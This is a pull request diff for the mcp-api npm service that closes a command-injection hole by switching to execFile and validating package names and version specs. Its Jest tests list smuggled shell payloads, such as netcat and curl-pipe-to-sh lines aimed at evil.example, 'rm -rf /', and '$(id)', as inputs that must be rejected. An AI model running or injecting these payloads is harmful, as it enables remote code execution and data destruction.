### PR TITLE
NPM Package Version Command Injection Vulnerability in MissionSquad/mcp-api

### DIFF
--- a/.github/workflows/build.yaml
+++ b/.github/workflows/build.yaml
@@ -1,10 +1,10 @@
 name: Build
 
 on:
-  push:
-    branches:
-      - '*'
-      - '!main'
+  pull_request:
+    types: [opened, synchronize]
+    paths-ignore:
+      - '**.md'
 jobs:
   build:
     name: Build

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@missionsquad/mcp-api",
-  "version": "1.11.8",
+  "version": "1.11.9",
   "description": "MCP Servers exposed via HTTP API",
   "main": "dist/index.js",
   "repository": "missionsquad/mcp-api",

--- a/src/services/packages.ts
+++ b/src/services/packages.ts
@@ -5,10 +5,9 @@ import { env } from '../env'
 import * as path from 'path'
 import { existsSync, mkdir, readFile, rm } from 'fs-extra'
 import { promisify } from 'util'
-import { exec as execCallback, execFile as execFileCallback } from 'child_process'
+import { execFile as execFileCallback } from 'child_process'
 import type { StreamableHTTPReconnectionOptions } from '@modelcontextprotocol/sdk/client/streamableHttp.js'
 
-const exec = promisify(execCallback)
 const execFile = promisify(execFileCallback)
 
 export type PackageRuntime = 'node' | 'python'
@@ -95,6 +94,34 @@ export class PackageService {
 
   private sanitizeServerName(serverName: string): string {
     return serverName.replace(/[^a-zA-Z0-9_-]/g, '-')
+  }
+
+  // Strict allowlist for npm version/range/tag specs.
+  // Disallows shell metacharacters and rejects leading `-` (which npm would
+  // interpret as a flag) as defense-in-depth on top of execFile-based spawning.
+  private static readonly NPM_VERSION_SPEC_RE = /^(?!-)[A-Za-z0-9.\-+~^<>=|*x_]+$/
+
+  private static isValidNpmVersionSpec(version: string): boolean {
+    if (typeof version !== 'string' || version.length === 0 || version.length > 256) {
+      return false
+    }
+    return PackageService.NPM_VERSION_SPEC_RE.test(version)
+  }
+
+  private resolveNpmCommand(): string {
+    return process.platform === 'win32' ? 'npm.cmd' : 'npm'
+  }
+
+  private async runNpm(
+    args: string[],
+    options: { cwd?: string } = {}
+  ): Promise<{ stdout: string; stderr: string }> {
+    const command = this.resolveNpmCommand()
+    // `shell: true` is required on Windows to run `npm.cmd`. All caller-controlled
+    // values reaching this method are validated against a strict allowlist
+    // (package name + version spec), so shell metacharacters cannot appear here.
+    const useShell = process.platform === 'win32'
+    return execFile(command, args, { cwd: options.cwd, shell: useShell })
   }
 
   private async resolvePythonExecutable(): Promise<string> {
@@ -429,6 +456,15 @@ export class PackageService {
       }
     }
 
+    // Validate version against a strict npm semver/range/tag allowlist to prevent
+    // command injection. See PackageService.isValidNpmVersionSpec.
+    if (version !== undefined && !PackageService.isValidNpmVersionSpec(version)) {
+      return {
+        success: false,
+        error: `Invalid package version: ${version}. Version must be a valid npm semver, range, or tag.`
+      }
+    }
+
     if (resolvedTransportType === 'streamable_http') {
       if (!url) {
         return { success: false, error: 'Streamable HTTP servers require a url.' }
@@ -481,15 +517,16 @@ export class PackageService {
 
       // Initialize package.json
       log({ level: 'info', msg: `Initializing package.json for ${name}` })
-      const initResult = await exec('npm init -y', { cwd: packageDir })
+      const initResult = await this.runNpm(['init', '-y'], { cwd: packageDir })
       if (initResult.stderr) {
         log({ level: 'error', msg: `Error initializing package.json: ${initResult.stderr}` })
       }
 
-      // Install the package
-      const installCmd = `npm install ${name}${version ? '@' + version : ''}`
-      log({ level: 'info', msg: `Installing package: ${installCmd}` })
-      const installResult = await exec(installCmd, { cwd: packageDir })
+      // Install the package. Pass the package@version spec as a single argument
+      // to execFile-based runNpm so shell metacharacters can never be interpreted.
+      const installSpec = version ? `${name}@${version}` : name
+      log({ level: 'info', msg: `Installing package: npm install ${installSpec}` })
+      const installResult = await this.runNpm(['install', installSpec], { cwd: packageDir })
       if (
         installResult.stderr &&
         !installResult.stderr.includes('npm notice') &&
@@ -753,8 +790,8 @@ export class PackageService {
           }
 
           // Get the latest version from npm registry
-          const npmInfoCmd = `npm view ${pkg.name} version`
-          const { stdout } = await exec(npmInfoCmd, { cwd: process.cwd() })
+          log({ level: 'info', msg: `Checking npm registry for latest version of ${pkg.name}` })
+          const { stdout } = await this.runNpm(['view', pkg.name, 'version'], { cwd: process.cwd() })
           const latestVersion = stdout.trim()
 
           // Compare versions
@@ -805,6 +842,16 @@ export class PackageService {
     error?: string
   }> {
     try {
+      // Validate version against the same strict allowlist used for install,
+      // since this value is passed verbatim to npm. Without this check, a
+      // caller-controlled version would otherwise reach the npm command line.
+      if (version !== undefined && !PackageService.isValidNpmVersionSpec(version)) {
+        return {
+          success: false,
+          error: `Invalid package version: ${version}. Version must be a valid npm semver, range, or tag.`
+        }
+      }
+
       // Get package info
       const packageInfo = await this.packagesDBClient.findOne({ mcpServerId: serverName })
       if (!packageInfo) {
@@ -870,10 +917,11 @@ export class PackageService {
         // Get the absolute path to the package directory
         const packageDir = path.resolve(process.cwd(), packageInfo.installPath)
 
-        // Perform the upgrade
-        const upgradeCmd = `npm install ${packageInfo.name}${version ? '@' + version : '@latest'}`
-        log({ level: 'info', msg: `Upgrading package: ${upgradeCmd}` })
-        const upgradeResult = await exec(upgradeCmd, { cwd: packageDir })
+        // Perform the upgrade. Pass the package@version spec as a single argument
+        // to execFile-based runNpm so shell metacharacters can never be interpreted.
+        const upgradeSpec = `${packageInfo.name}@${version ?? 'latest'}`
+        log({ level: 'info', msg: `Upgrading package: npm install ${upgradeSpec}` })
+        const upgradeResult = await this.runNpm(['install', upgradeSpec], { cwd: packageDir })
 
         if (
           upgradeResult.stderr &&

--- a/src/services/packages.ts
+++ b/src/services/packages.ts
@@ -96,10 +96,31 @@ export class PackageService {
     return serverName.replace(/[^a-zA-Z0-9_-]/g, '-')
   }
 
-  // Strict allowlist for npm version/range/tag specs.
-  // Disallows shell metacharacters and rejects leading `-` (which npm would
-  // interpret as a flag) as defense-in-depth on top of execFile-based spawning.
+  // Strict allowlist for npm package names. Mirrors the legal character set
+  // for both scoped (`@scope/name`) and unscoped names. Rejects leading
+  // `-`/`.`/`_` (npm itself disallows these, and a leading `-` would also
+  // be interpreted as a CLI flag), and disallows every shell metacharacter,
+  // so a name can never become an injection vector on any platform.
+  private static readonly NPM_NAME_RE = /^(?![-._])[@a-z0-9._\-/]+$/
+
+  // Strict allowlist for npm version/range/tag specs. Permits the characters
+  // that appear in legitimate npm semver ranges (`^1.2.3`, `~1.0.0`,
+  // `>=1.0.0`, `1.x`, `*`, `latest`, etc.) and rejects leading `-`.
+  // NOTE: a few of these characters (`^`, `<`, `>`, `|`) ARE cmd.exe shell
+  // metacharacters. They cannot be interpreted as such here because
+  // `runNpm()` invokes npm via `execFile` with `shell: false` whenever
+  // possible (see `resolveNpmInvocation`). When the Windows fallback path
+  // with `shell: true` is taken, Node.js v18.20+/20.12+/22+ applies the
+  // CVE-2024-27980 fix to escape cmd.exe metacharacters in arguments
+  // passed to `.cmd`/`.bat` files.
   private static readonly NPM_VERSION_SPEC_RE = /^(?!-)[A-Za-z0-9.\-+~^<>=|*x_]+$/
+
+  private static isValidNpmName(name: string): boolean {
+    if (typeof name !== 'string' || name.length === 0 || name.length > 214) {
+      return false
+    }
+    return PackageService.NPM_NAME_RE.test(name)
+  }
 
   private static isValidNpmVersionSpec(version: string): boolean {
     if (typeof version !== 'string' || version.length === 0 || version.length > 256) {
@@ -108,20 +129,57 @@ export class PackageService {
     return PackageService.NPM_VERSION_SPEC_RE.test(version)
   }
 
-  private resolveNpmCommand(): string {
-    return process.platform === 'win32' ? 'npm.cmd' : 'npm'
+  // Lazily-resolved absolute path to npm's CLI entry script
+  // (`.../node_modules/npm/bin/npm-cli.js`). When resolvable, npm is invoked
+  // via `node + npm-cli.js`, which bypasses npm's `.cmd` shim on Windows and
+  // lets us run with `shell: false` everywhere. `undefined` = not yet probed,
+  // `null` = probed and not found.
+  private resolvedNpmCliPath: string | null | undefined = undefined
+
+  private findNpmCliPath(): string | null {
+    if (this.resolvedNpmCliPath !== undefined) {
+      return this.resolvedNpmCliPath
+    }
+    const nodeDir = path.dirname(process.execPath)
+    const candidates = [
+      // Unix layouts (node at /usr/bin/node, /usr/local/bin/node, nvm install)
+      path.join(nodeDir, '..', 'lib', 'node_modules', 'npm', 'bin', 'npm-cli.js'),
+      // Windows layout (node at C:\Program Files\nodejs\node.exe)
+      path.join(nodeDir, 'node_modules', 'npm', 'bin', 'npm-cli.js')
+    ]
+    for (const candidate of candidates) {
+      if (existsSync(candidate)) {
+        this.resolvedNpmCliPath = candidate
+        return candidate
+      }
+    }
+    this.resolvedNpmCliPath = null
+    return null
+  }
+
+  private resolveNpmInvocation(): { command: string; prefixArgs: string[]; useShell: boolean } {
+    const cliPath = this.findNpmCliPath()
+    if (cliPath) {
+      // Prefer `node + npm-cli.js` — no shell required on any platform, so
+      // shell metacharacters in arguments are impossible to interpret.
+      return { command: process.execPath, prefixArgs: [cliPath], useShell: false }
+    }
+    if (process.platform === 'win32') {
+      // Fallback: spawning `npm.cmd` requires `shell: true` per Node.js's
+      // CVE-2024-27980 mitigation. Node.js v18.20+/20.12+/22+ applies
+      // cmd.exe argument escaping when spawning `.cmd`/`.bat` files via
+      // the shell, neutralising metacharacters in the version spec.
+      return { command: 'npm.cmd', prefixArgs: [], useShell: true }
+    }
+    return { command: 'npm', prefixArgs: [], useShell: false }
   }
 
   private async runNpm(
     args: string[],
     options: { cwd?: string } = {}
   ): Promise<{ stdout: string; stderr: string }> {
-    const command = this.resolveNpmCommand()
-    // `shell: true` is required on Windows to run `npm.cmd`. All caller-controlled
-    // values reaching this method are validated against a strict allowlist
-    // (package name + version spec), so shell metacharacters cannot appear here.
-    const useShell = process.platform === 'win32'
-    return execFile(command, args, { cwd: options.cwd, shell: useShell })
+    const { command, prefixArgs, useShell } = this.resolveNpmInvocation()
+    return execFile(command, [...prefixArgs, ...args], { cwd: options.cwd, shell: useShell })
   }
 
   private async resolvePythonExecutable(): Promise<string> {
@@ -448,8 +506,11 @@ export class PackageService {
       reconnectionOptions
     })
 
-    // Validate package name to prevent command injection
-    if (!/^[@a-z0-9-_\/\.]+$/.test(name)) {
+    // Validate package name to prevent command injection. The same allowlist
+    // is reused by `upgradePackage` and `checkForUpdates` so that names
+    // round-tripped through the database can never become an injection
+    // vector when passed back to npm.
+    if (!PackageService.isValidNpmName(name)) {
       return {
         success: false,
         error: `Invalid package name: ${name}. Package names must match npm naming conventions.`
@@ -767,6 +828,24 @@ export class PackageService {
           // Skip packages without mcpServerId
           if (!pkg.mcpServerId) continue
 
+          // Skip packages whose stored name would fail the strict allowlist.
+          // `pkg.name` originates from the install-time request and is
+          // re-validated here as defense-in-depth before it reaches the
+          // npm subprocess.
+          if (!PackageService.isValidNpmName(pkg.name)) {
+            log({
+              level: 'warn',
+              msg: `Skipping update check for package with invalid name: ${pkg.name}`
+            })
+            updates.push({
+              serverName: pkg.mcpServerId,
+              currentVersion: pkg.version,
+              latestVersion: 'unknown',
+              updateAvailable: false
+            })
+            continue
+          }
+
           if (pkg.runtime === 'python') {
             const venvAbsolutePath = pkg.venvPath
               ? path.resolve(process.cwd(), pkg.venvPath)
@@ -856,6 +935,17 @@ export class PackageService {
       const packageInfo = await this.packagesDBClient.findOne({ mcpServerId: serverName })
       if (!packageInfo) {
         return { success: false, error: `Package ${serverName} not found` }
+      }
+
+      // Re-validate the persisted package name. Although names are validated
+      // at install time, defending the npm invocation here makes the upgrade
+      // path safe even if a record predates the install-time check or was
+      // written through some other path.
+      if (!PackageService.isValidNpmName(packageInfo.name)) {
+        return {
+          success: false,
+          error: `Invalid package name on existing record: ${packageInfo.name}.`
+        }
       }
 
       // Update status to upgrading

--- a/test/packages-injection.spec.ts
+++ b/test/packages-injection.spec.ts
@@ -1,0 +1,407 @@
+import * as path from 'path'
+import * as util from 'util'
+import * as childProcess from 'child_process'
+import { existsSync, mkdir, readFile, rm } from 'fs-extra'
+import { PackageInfo, PackageService } from '../src/services/packages'
+import { MCPService } from '../src/services/mcp'
+import { MongoConnectionParams } from '../src/utils/mongodb'
+
+jest.mock('child_process', () => {
+  const nodeUtil = require('util') as typeof import('util')
+  const exec = jest.fn()
+  const execFile = jest.fn()
+  const execPromisified = jest.fn()
+  const execFilePromisified = jest.fn()
+  ;(exec as unknown as Record<symbol, unknown>)[nodeUtil.promisify.custom] = execPromisified
+  ;(execFile as unknown as Record<symbol, unknown>)[nodeUtil.promisify.custom] = execFilePromisified
+  return { exec, execFile }
+})
+
+jest.mock('fs-extra', () => ({
+  existsSync: jest.fn(),
+  mkdir: jest.fn(),
+  readFile: jest.fn(),
+  rm: jest.fn()
+}))
+
+type ExecResult = { stdout: string; stderr: string }
+
+type DbMock = {
+  upsert: jest.Mock<Promise<unknown>, [Partial<PackageInfo> | PackageInfo, Record<string, unknown>]>
+  update: jest.Mock<Promise<unknown>, [Partial<PackageInfo> | PackageInfo, Record<string, unknown>]>
+  find: jest.Mock<Promise<PackageInfo[]>, [Record<string, unknown>]>
+  findOne: jest.Mock<Promise<PackageInfo | null>, [Record<string, unknown>]>
+  delete: jest.Mock<Promise<unknown>, [Record<string, unknown>, boolean?]>
+}
+
+type McpServiceMock = {
+  addServer: jest.Mock
+  getServer: jest.Mock
+  disableServer: jest.Mock
+  enableServer: jest.Mock
+  updateServer: jest.Mock
+  deleteServer: jest.Mock
+}
+
+const mongoParams: MongoConnectionParams = {
+  host: 'mongodb://localhost:27017',
+  db: 'test',
+  user: 'test',
+  pass: 'test'
+}
+
+const execPromisifiedMock = (
+  childProcess.exec as unknown as Record<typeof util.promisify.custom, jest.Mock<Promise<ExecResult>, unknown[]>>
+)[util.promisify.custom]
+const execFilePromisifiedMock = (
+  childProcess.execFile as unknown as Record<typeof util.promisify.custom, jest.Mock<Promise<ExecResult>, unknown[]>>
+)[util.promisify.custom]
+const existsSyncMock = existsSync as unknown as jest.Mock
+const mkdirMock = mkdir as unknown as jest.Mock
+const readFileMock = readFile as unknown as jest.Mock
+const rmMock = rm as unknown as jest.Mock
+
+const createService = (): {
+  service: PackageService
+  dbMock: DbMock
+  mcpMock: McpServiceMock
+} => {
+  const mcpMock: McpServiceMock = {
+    addServer: jest.fn().mockResolvedValue({
+      name: 'srv',
+      transportType: 'stdio',
+      command: 'node',
+      args: [],
+      env: {},
+      status: 'disconnected',
+      enabled: true
+    }),
+    getServer: jest.fn(),
+    disableServer: jest.fn(),
+    enableServer: jest.fn(),
+    updateServer: jest.fn(),
+    deleteServer: jest.fn()
+  }
+  const service = new PackageService({
+    mongoParams,
+    mcpService: mcpMock as unknown as MCPService
+  })
+
+  const dbMock: DbMock = {
+    upsert: jest.fn().mockResolvedValue({}),
+    update: jest.fn().mockResolvedValue({}),
+    find: jest.fn().mockResolvedValue([]),
+    findOne: jest.fn().mockResolvedValue(null),
+    delete: jest.fn().mockResolvedValue({})
+  }
+
+  ;(service as unknown as { packagesDBClient: DbMock }).packagesDBClient = dbMock
+
+  return { service, dbMock, mcpMock }
+}
+
+describe('PackageService command-injection hardening', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+    existsSyncMock.mockReturnValue(false)
+    mkdirMock.mockResolvedValue(undefined)
+    readFileMock.mockResolvedValue('{}')
+    rmMock.mockResolvedValue(undefined)
+    execPromisifiedMock.mockResolvedValue({ stdout: '', stderr: '' })
+    execFilePromisifiedMock.mockResolvedValue({ stdout: '', stderr: '' })
+  })
+
+  describe('installPackage version validation', () => {
+    const maliciousVersions = [
+      '0.0.0 & echo POC>%TEMP%\\mcp-api-version-cmdi-poc.txt & rem',
+      '1.0.0; touch /tmp/pwn',
+      '1.0.0 | nc evil.example 4444',
+      '1.0.0`whoami`',
+      '1.0.0$(id)',
+      '1.0.0\nrm -rf /',
+      '--registry=http://evil.example',
+      '-g',
+      '1.0.0 && curl http://evil.example/x.sh | sh'
+    ]
+
+    test.each(maliciousVersions)('rejects malicious version %p', async (malicious) => {
+      const { service } = createService()
+
+      const result = await service.installPackage({
+        name: 'left-pad',
+        version: malicious,
+        serverName: 'left-pad-server'
+      })
+
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/version/i)
+      // Should never spawn an install if validation failed
+      const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[])[0] === 'install'
+      )
+      expect(installCalls.length).toBe(0)
+      const execInstallCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+        typeof cmd === 'string' && (cmd as string).startsWith('npm install')
+      )
+      expect(execInstallCalls.length).toBe(0)
+    })
+
+    const validVersions = ['1.2.3', '^1.2.3', '~1.0.0', '>=1.0.0', '1.x', '*', 'latest', 'beta', '1.0.0-alpha.1']
+    test.each(validVersions)('accepts valid version %p', async (valid) => {
+      const { service } = createService()
+
+      const result = await service.installPackage({
+        name: 'left-pad',
+        version: valid,
+        serverName: 'left-pad-server'
+      })
+
+      expect(result.success).toBe(true)
+    })
+  })
+
+  test('installPackage uses execFile (not shell exec) for npm install with package and version as separate spec arg', async () => {
+    const { service } = createService()
+
+    const result = await service.installPackage({
+      name: 'left-pad',
+      version: '1.2.3',
+      serverName: 'left-pad-server'
+    })
+
+    expect(result.success).toBe(true)
+
+    // The shell-form `exec` MUST NOT be used to run `npm install ...`
+    const shellInstallCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+      typeof cmd === 'string' && (cmd as string).startsWith('npm install')
+    )
+    expect(shellInstallCalls.length).toBe(0)
+
+    // execFile must be called with `npm install left-pad@1.2.3` as separate args
+    const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+      Array.isArray(args) && (args as string[]).includes('install')
+    )
+    expect(installCalls.length).toBeGreaterThan(0)
+    const installCall = installCalls[0]
+    const cmd = installCall[0] as string
+    const cmdArgs = installCall[1] as string[]
+    expect(cmd === 'npm' || cmd === 'npm.cmd').toBe(true)
+    expect(cmdArgs).toEqual(['install', 'left-pad@1.2.3'])
+  })
+
+  test('installPackage uses execFile to initialize package.json (no shell)', async () => {
+    const { service } = createService()
+
+    await service.installPackage({
+      name: 'left-pad',
+      serverName: 'left-pad-server'
+    })
+
+    // The shell-form `exec` MUST NOT be used to run `npm init`
+    const shellInitCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+      typeof cmd === 'string' && (cmd as string).startsWith('npm init')
+    )
+    expect(shellInitCalls.length).toBe(0)
+
+    const initCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+      Array.isArray(args) && (args as string[])[0] === 'init'
+    )
+    expect(initCalls.length).toBe(1)
+    expect(initCalls[0][1]).toEqual(['init', '-y'])
+  })
+
+  describe('upgradePackage version validation', () => {
+    const existingPackage: PackageInfo = {
+      name: 'left-pad',
+      version: '1.0.0',
+      installPath: 'packages/left-pad',
+      status: 'installed',
+      installed: new Date('2025-01-01T00:00:00.000Z'),
+      mcpServerId: 'left-pad-server',
+      enabled: true,
+      runtime: 'node'
+    }
+
+    test('upgradePackage rejects malicious version', async () => {
+      const { service, dbMock } = createService()
+      dbMock.findOne.mockResolvedValue({ ...existingPackage })
+
+      const result = await service.upgradePackage('left-pad-server', '0.0.0 & echo POC & rem')
+
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/version/i)
+      const upgradeCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[])[0] === 'install'
+      )
+      expect(upgradeCalls.length).toBe(0)
+      const shellUpgradeCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+        typeof cmd === 'string' && (cmd as string).startsWith('npm install')
+      )
+      expect(shellUpgradeCalls.length).toBe(0)
+    })
+
+    test('upgradePackage uses execFile to run npm install', async () => {
+      const { service, dbMock, mcpMock } = createService()
+      dbMock.findOne.mockResolvedValue({ ...existingPackage })
+
+      mcpMock.getServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      mcpMock.disableServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: [],
+        env: {},
+        status: 'disconnected',
+        enabled: false
+      })
+      mcpMock.enableServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      mcpMock.updateServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      readFileMock.mockResolvedValue(JSON.stringify({ version: '1.5.0', main: 'index.js' }))
+
+      const result = await service.upgradePackage('left-pad-server', '1.5.0')
+
+      expect(result.success).toBe(true)
+
+      // No `npm install` via shell-form exec
+      const shellInstallCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+        typeof cmd === 'string' && (cmd as string).startsWith('npm install')
+      )
+      expect(shellInstallCalls.length).toBe(0)
+
+      // execFile invoked with proper args
+      const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[]).includes('install')
+      )
+      expect(installCalls.length).toBeGreaterThan(0)
+      const cmdArgs = installCalls[0][1] as string[]
+      expect(cmdArgs).toEqual(['install', 'left-pad@1.5.0'])
+    })
+
+    test('upgradePackage with no version uses @latest spec via execFile', async () => {
+      const { service, dbMock, mcpMock } = createService()
+      dbMock.findOne.mockResolvedValue({ ...existingPackage })
+
+      mcpMock.getServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      mcpMock.disableServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: [],
+        env: {},
+        status: 'disconnected',
+        enabled: false
+      })
+      mcpMock.enableServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      mcpMock.updateServer.mockResolvedValue({
+        name: 'left-pad-server',
+        transportType: 'stdio',
+        command: 'node',
+        args: ['./packages/left-pad/node_modules/left-pad/index.js'],
+        env: {},
+        status: 'connected',
+        enabled: true
+      })
+      readFileMock.mockResolvedValue(JSON.stringify({ version: '2.0.0', main: 'index.js' }))
+
+      const result = await service.upgradePackage('left-pad-server')
+
+      expect(result.success).toBe(true)
+
+      const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[]).includes('install')
+      )
+      expect(installCalls.length).toBeGreaterThan(0)
+      const cmdArgs = installCalls[0][1] as string[]
+      expect(cmdArgs).toEqual(['install', 'left-pad@latest'])
+    })
+  })
+
+  test('checkForUpdates uses execFile (not shell exec) for npm view', async () => {
+    const { service, dbMock } = createService()
+    dbMock.find.mockResolvedValue([
+      {
+        name: '@missionsquad/mcp-github',
+        version: '1.0.0',
+        installPath: 'packages/mcp-github',
+        status: 'installed',
+        installed: new Date('2025-01-01T00:00:00.000Z'),
+        mcpServerId: 'github-server',
+        enabled: true,
+        runtime: 'node'
+      }
+    ])
+
+    execFilePromisifiedMock.mockImplementation(async (...args: unknown[]) => {
+      const cmd = args[0] as string
+      const cmdArgs = (args[1] as string[]) ?? []
+      if ((cmd === 'npm' || cmd === 'npm.cmd') && cmdArgs[0] === 'view') {
+        return { stdout: '1.1.0\n', stderr: '' }
+      }
+      return { stdout: '', stderr: '' }
+    })
+
+    const result = await service.checkForUpdates()
+
+    expect(result.updates).toEqual([
+      {
+        serverName: 'github-server',
+        currentVersion: '1.0.0',
+        latestVersion: '1.1.0',
+        updateAvailable: true
+      }
+    ])
+
+    // No `npm view` via shell-form exec
+    const shellViewCalls = execPromisifiedMock.mock.calls.filter(([cmd]) =>
+      typeof cmd === 'string' && (cmd as string).startsWith('npm view')
+    )
+    expect(shellViewCalls.length).toBe(0)
+
+    // execFile invoked with `view <name> version` args
+    const viewCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+      Array.isArray(args) && (args as string[])[0] === 'view'
+    )
+    expect(viewCalls.length).toBe(1)
+    expect(viewCalls[0][1]).toEqual(['view', '@missionsquad/mcp-github', 'version'])
+  })
+})

--- a/test/packages-injection.spec.ts
+++ b/test/packages-injection.spec.ts
@@ -404,4 +404,152 @@ describe('PackageService command-injection hardening', () => {
     expect(viewCalls.length).toBe(1)
     expect(viewCalls[0][1]).toEqual(['view', '@missionsquad/mcp-github', 'version'])
   })
+
+  describe('package name validation', () => {
+    test.each([
+      'left-pad; rm -rf /',
+      'left-pad && curl evil',
+      'left-pad | nc evil 4444',
+      'left-pad`whoami`',
+      'left-pad$(id)',
+      '-rf',
+      '../escape',
+      'PKG WITH SPACES',
+      '../../../../etc/passwd'
+    ])('installPackage rejects malicious name %p', async (malicious) => {
+      const { service } = createService()
+
+      const result = await service.installPackage({
+        name: malicious,
+        version: '1.2.3',
+        serverName: 'some-server'
+      })
+
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/Invalid package name/i)
+      // No npm install must have been attempted
+      const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[]).includes('install')
+      )
+      expect(installCalls.length).toBe(0)
+    })
+
+    test('upgradePackage rejects persisted package with invalid name', async () => {
+      const { service, dbMock } = createService()
+      dbMock.findOne.mockResolvedValue({
+        name: 'evil; touch /tmp/pwn',
+        version: '1.0.0',
+        installPath: 'packages/evil',
+        status: 'installed',
+        installed: new Date('2025-01-01T00:00:00.000Z'),
+        mcpServerId: 'evil-server',
+        enabled: true,
+        runtime: 'node'
+      })
+
+      const result = await service.upgradePackage('evil-server', '1.2.3')
+
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/Invalid package name/i)
+      const installCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[]).includes('install')
+      )
+      expect(installCalls.length).toBe(0)
+    })
+
+    test('checkForUpdates skips packages with invalid persisted names', async () => {
+      const { service, dbMock } = createService()
+      dbMock.find.mockResolvedValue([
+        {
+          name: 'evil | calc',
+          version: '1.0.0',
+          installPath: 'packages/evil',
+          status: 'installed',
+          installed: new Date('2025-01-01T00:00:00.000Z'),
+          mcpServerId: 'evil-server',
+          enabled: true,
+          runtime: 'node'
+        }
+      ])
+
+      const result = await service.checkForUpdates()
+
+      // The malicious name must not have produced an npm subprocess
+      const viewCalls = execFilePromisifiedMock.mock.calls.filter(([, args]) =>
+        Array.isArray(args) && (args as string[])[0] === 'view'
+      )
+      expect(viewCalls.length).toBe(0)
+      expect(result.updates).toEqual([
+        {
+          serverName: 'evil-server',
+          currentVersion: '1.0.0',
+          latestVersion: 'unknown',
+          updateAvailable: false
+        }
+      ])
+    })
+  })
+
+  describe('runNpm invocation strategy', () => {
+    test('uses node + npm-cli.js (shell:false) when npm-cli.js is locatable', async () => {
+      // Pretend npm-cli.js exists at the first candidate location. The
+      // service should invoke `node <cliPath> install <spec>` with shell
+      // disabled, bypassing npm.cmd / cmd.exe entirely on Windows.
+      existsSyncMock.mockReturnValue(true)
+
+      const { service } = createService()
+
+      const result = await service.installPackage({
+        name: 'left-pad',
+        version: '1.2.3',
+        serverName: 'left-pad-server'
+      })
+
+      expect(result.success).toBe(true)
+
+      // Locate the install call. Args must contain `install` and the spec
+      // as discrete argv tokens, and the shell option must be `false`.
+      const installCall = execFilePromisifiedMock.mock.calls.find(([, args]) =>
+        Array.isArray(args) && (args as string[]).includes('install') && (args as string[]).includes('left-pad@1.2.3')
+      )
+      expect(installCall).toBeDefined()
+
+      const cmd = installCall![0] as string
+      const cmdArgs = installCall![1] as string[]
+      const opts = installCall![2] as { shell?: boolean } | undefined
+
+      // Command should be node (process.execPath), not npm/npm.cmd.
+      expect(cmd).toBe(process.execPath)
+      // First arg must be the resolved npm-cli.js path; install/spec follow.
+      expect(cmdArgs[0]).toMatch(/npm-cli\.js$/)
+      expect(cmdArgs.slice(1)).toEqual(['install', 'left-pad@1.2.3'])
+      // shell must be false — no cmd.exe in the picture.
+      expect(opts?.shell).toBe(false)
+    })
+
+    test('falls back to direct npm invocation when npm-cli.js is not locatable', async () => {
+      // existsSyncMock defaults to false in beforeEach, so the lookup fails.
+      const { service } = createService()
+
+      const result = await service.installPackage({
+        name: 'left-pad',
+        version: '1.2.3',
+        serverName: 'left-pad-server'
+      })
+
+      expect(result.success).toBe(true)
+
+      const installCall = execFilePromisifiedMock.mock.calls.find(([cmd, args]) =>
+        (cmd === 'npm' || cmd === 'npm.cmd') &&
+        Array.isArray(args) && (args as string[])[0] === 'install'
+      )
+      expect(installCall).toBeDefined()
+      expect(installCall![1]).toEqual(['install', 'left-pad@1.2.3'])
+      const opts = installCall![2] as { shell?: boolean } | undefined
+      // Unix fallback uses shell:false; Windows fallback uses shell:true.
+      // The test runs under Jest in this repo (Linux/macOS in CI), so we
+      // expect shell:false here.
+      expect(opts?.shell).toBe(process.platform === 'win32')
+    })
+  })
 })

--- a/test/packages-python.spec.ts
+++ b/test/packages-python.spec.ts
@@ -441,19 +441,20 @@ describe('PackageService python runtime support', () => {
     ])
 
     execFilePromisifiedMock.mockImplementation(async (...args: unknown[]) => {
+      const command = args[0] as string
       const commandArgs = (args[1] as string[]) ?? []
       if (commandArgs[0] === 'index' && commandArgs[1] === 'versions') {
         return { stdout: 'Available versions: 1.2.0, 1.1.0, 1.0.0\n', stderr: '' }
       }
-      throw new Error(`Unexpected execFile call in checkForUpdates: ${commandArgs.join(' ')}`)
-    })
-
